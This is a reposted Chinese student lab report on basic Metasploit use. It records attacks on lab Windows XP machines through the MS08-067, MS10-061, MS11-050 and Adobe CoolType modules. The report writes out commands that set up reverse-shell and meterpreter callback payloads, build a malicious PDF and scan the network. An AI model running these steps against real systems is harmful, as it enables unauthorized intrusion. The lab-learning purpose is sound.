20145320 《网络渗透》MSF基础应用

最新推荐文章于 2024-10-11 20:52:27 发布
最新推荐文章于 2024-10-11 20:52:27 发布
阅读量140 收藏
点赞数
文章标签: 操作系统 运维 数据库
原文链接:http://www.cnblogs.com/zqh20145320/p/6714618.html
版权

20145320 《网络渗透》MSF基础应用

1.实验后回答问题

  • exploit
    • 攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。像我们这次做的实验中,第一个是主动攻击,第二三个均属于被动攻击。
  • payload
    • 攻击载荷模块,这个模块实质是一段shellcode。在渗透成功之后,将程序流程劫持并跳转入这段机器代码中执行
  • encode
    • 编码器模块,首先是确保不会出现“坏字符”(如0x00字符串尾部,会截断后面的内容)。其次是“免杀”,防止受到杀毒软件的阻断!

2.实验总结与体会

这几个实验我发现就是在使用exploit攻击模块中不同的攻击方法进行攻击,而且流程基本都一样。先使用search exploit/windows/smb/ms找到windows中的漏洞,然后看看其简单的描述,选中其中一个使用info xxx查看其信息,主要看其可攻击targets、描述、必须设置的参数。接下来设置payload,同时设置payload的参数,所有的参数都设置完毕之后就可以进行exploit攻击了!总的来说就是在使用metaspolit这个软件提供的攻击服务!!

在完成老师安排的任务之外,我还尝试了:

ms06_066_nwapi

885438-20170414175456751-256798476.png
只差一步可恶!

下面这个是成功的!!!

MS10_061远程漏洞攻击(主动攻击)

use exploit/windows/smb/ms10_061_spoolss进入攻击模块

info查看
885438-20170415162444048-1331324348.png
等级Excellent,发布时间2010-09-14

885438-20170415162501564-1475004655.png

目标机器:所有的windows平台

885438-20170415162515892-1903945045.png
需要设置参数:目标地址和端口,可选:目标共享打印机名
885438-20170415162532626-229281936.png
描述:打印机漏洞

被进攻的机器为Windows xp中文版
其中xp中要有共享打印机,具体做法

1、在控制面板中的---打印机和传真---下有默认的Microsoft打印机,但好像并不好用(可以尝试下直接改属性---端口为COM1试试)。

2、VMware提供虚拟打印机,在com1口。

3、删掉了默认的打印机(自愿),然后,添加打印机---连接到次计算机的本地打印机(去掉勾选的自动检测)---COM1口(VMware中查看即可)---打印机厂商默认即可---打印机名---共享---位置随意可不填

4、重启print Spooler服务(不重启可能导致meta连接打印机失败)

回到Linux中,设置相关参数后(要注意:set PNAME 为目标打印机name),exploit攻击成功!
885438-20170415163502236-205440886.png

要攻击一个有漏洞的主机简直不过太简单了!!!我感觉修复一个漏洞所需要的时间还没有使用这个漏洞拿来攻击所花费的时间长!!以后有补丁真的马上安装,我再也不敢拖了。真的害怕!

3.实践过程记录

MS08_067远程漏洞攻击实践

输入命令use exploit/windows/smb/ms08_067_netapi,info了解该漏洞模块的使用。

885438-20170413215522205-419091647.png
windows平台,等级great,补丁发布时间2008-10-28

885438-20170413215546486-1090017589.png
可攻击的目标:windows 2003

885438-20170413215636830-32825493.png
需要设置的参数目标地址(RHOST)、目标端口(RPORT)、使用管道(SMBPIPE)

885438-20170413215710517-1032550374.png
描述如上

输入命令show payloads会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

885438-20170414155711064-97651018.png

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

根据show options中必须设置的东西进行设置

HvnD5lA.png

输入命令exploit开始攻击,轻而易举的正常攻击成功

885438-20170414160809408-1709525012.png

中途我对老师给的中文版的windows xp进行攻击,以为成功了,没想到看了同学的博客发现是白开心一场
885438-20170414160713548-1065824199.png

MS11-050漏洞攻击

同上述步骤,第一步,查找相关漏洞信息
885438-20170413204453751-1627667011.png
平台winodows,等级Normal,补丁发布时间2011-06-16
885438-20170413204539533-2055211776.png
可攻击的目标:XP或Vista的IE7和IE8
885438-20170413204558923-1594554841.png
必须的参数:反弹地址(SRVHOST)、反弹端口(SRVPORT)
885438-20170413204624501-138479881.png
描述

使用show payloads指令查看可以使用的负载
JTRKH38.png

加载payload

    set payload windows/meterpreter/reverese_http

设置相应参数,通过show options查看

set URIPATH ms5320  //设置访问主页的URI
set LHOST 192.168.47.130    //设置攻击IP
set LPORT 8888  //设置攻击端口

打开服务exploit,发起渗透攻击
tLwsaQ2.png

此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.47.130:8080/ms5320

15HSJWZ.png

与此同时,在攻击机的MSF终端中,可以看到如下信息:
U9mEadG.png

输入sessions可以看见正在监听端的活动会话

NTh2GH1.png
发现1端口正在监听,使用session -i 1接入ID号为1的当前靶机回连的会话

rLLJwfe.png
攻击成功!

Adobe渗透测试过程

这个渗透攻击模块的路径为windows/fileformat/adobe_cooltype_sing,使用info查看该模块的内容
885438-20170412193618783-613312933.png

885438-20170412193653923-2075990205.png

可以看到这个漏洞是存在于8.2.4和9.3.4版本的Adobe Reader中,于2010-09-07发布的补丁,等级是Great。

我们进入该模块设定相关系数并生成相关文件5320.pdf
TeStuyn.png

885438-20170412092219969-1405214011.png

885438-20170412092236141-2133347244.png

将生成的pdf文件导入到windows XP Attacker靶机中运行,回连成功!
885438-20170412092300126-1374454253.png

这个这个pdf的内容,内容并不可疑!
885438-20170412092409876-2118267197.png

辅助模块

先手动创建一个msf所需的数据库

输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块

show options查看需要设置的消息,其中rhosts填写自己电脑所在网段

设置必要参数

set RHOSTS 172.30.1.0/21

set threads 2

命令run开启扫描,结果可以看到除了自己主机的IP,还有其他ip

885438-20170414162545564-1277722885.png

转载于:https://www.cnblogs.com/zqh20145320/p/6714618.html

weixin_30416497
关注
ms10-061打印后台程序服务远程代码执行漏洞 成功复现xp&win7
田一柠的博客
12-15 1970
漏洞介绍 Windows打印后台程序没有充分限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在windows系统目录(%SystemRoot%\system32)中创建文件。 攻击者可指定任意文件名,包括目录遍历,通过发送WritePrinter请求,攻击者可以完全控制创建文件的内容。 将文件写入到windows系统目录后,通过WMI来部署恶意程序,因为系统会自动运行%SYstemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。 该漏洞首次被发现并应用于著名的S
MS08067/MS10061漏洞靶机环境搭建总结
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week7-8 20165233
ahgq78625的博客
04-15 295
Exp5 MSF基础应用 目录 一、基础问题 二、攻击实例 主动攻击 ms08_067_netapi(成功) ms10_061_spoolss(失败) 针对浏览器的攻击 ms14_064_ole_code_execution(成功) ms16_051_vbscript(失败) 攻击客户端的实践 adobe_toolbutton(成功) ms10_087_rtf_pfragm...
CVE-2010-2729(MS10-061)
Ping_Pig的博客
10-22 1802
https://juejin.im/post/6844903782644449293
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4604
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
内网渗透 Metasploit(MSF基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 417
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
Exp6 MSF应用基础
qq_57435798的博客
05-04 704
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。exploit是载具,连接漏洞,将payload传送到靶机中。payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;
详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
内网渗透基础总结
wulanlin的博客
01-06 2295
研究内网安全我们首先需要弄明白内网是什么?在渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型局域网内,那么就可以把办公室内的局域网称为内网,公司的大型局域网称为外网。而通常情况下我们会同处于公司网和因特网之内,那么就会常常把因特网称为外网,公司网称为内网,久而久之这种概念也就形成了。内网相对于外网来说通信更快、传输文件更方便、共享更便利,但是相对来说安全性也更
msfvenom 简介
weixin_34138377的博客
10-23 1545
信很多人升级最新的msf后找不到自己曾经熟悉的msfpayload了(所以说喜欢收集shellcode是一件好事),没错我特么的也找不到了。其实可以use到自己要使用的payload,然后制作。但是也有人喜欢直接在终端里生产自己的shellcode。另外我想也找不到msfencode了,msfencode是shellcode的编码器,准确的来讲如果你自己编写一个shellco...
渗透中POC、EXP、Payload与Shellcode的区别
热门推荐
浅浅的博客
06-17 4万+
1. POC、EXP、Payload与Shellcode POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' ...
从零学习安全测试,从XSS漏洞攻击和防御开始
diezhuzhuo3333的博客
11-23 525
WeTest 导读 本篇包含了XSS漏洞攻击及防御详细介绍,包括漏洞基础、XSS基础、编码基础、XSS Payload、XSS攻击防御。 第一部分:漏洞攻防基础知识 XSS属于漏洞攻防,我们要研究它就要了解这个领域的一些行话,这样才好沟通交流。同时我建立了一个简易的攻击模型用于XSS漏洞学习。 1. 漏洞术语 了解一些简单术语就好。 VU...
exploit编写学习阶段性总结
同一片天空下
02-15 673
exploit编写学习阶段性总结.
《Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
最新发布
qq_45732829的博客
10-11 921
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
0x00000241 errcode:577 Windows 无法验证此文件的数字签名
啊渊的专栏
10-10 218
问题描述:0x00000241 errcode:577 Windows 无法验证此文件的数字签名安装自己开发的驱动失败导致。
RWKV-CHN模型部署教程
SJJS_1的博客
10-10 1201
RWKV-x060-World-7B-v2.1-20240507-ctx4096 一号空间,RWKV 语言模型旨在通过为自动化所有事情来消除使用大型语言模型的障碍。用户所需要的就是一个只有几兆字节的轻量级可执行程序。本文将详细介绍如何实现该模型的本地部署。
Windows11下 安装 Docker部分疑难杂症(Unexpecter WSL error)
weixin_43752106的博客
10-09 547
不过docker还是跑不起来,因为docker需要wsl2才能运行,后面就看到说要把Ubuntu 的wsl版本设为2。装了大半天Docker desktop终于装好了,网上有的主流教程就不复述了,主要说一下网上没有的教程。这时候突然想起以前因为虚拟机Vmware有蓝屏的现象,关闭了一些虚拟机相关服务,于是 来到。网上看了很多文章,我都设置了,没用,后看到这篇文章,卧槽,居然跑成功了。虽然不知道原理,但ubuntu确实可以使用了,也能看到有Ubuntu了。(修好了,没复现,借张图)这个非常棘手。
Linux&Shell命令
yin1331102028yin的博客
10-09 1109
Linux&Shell命令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值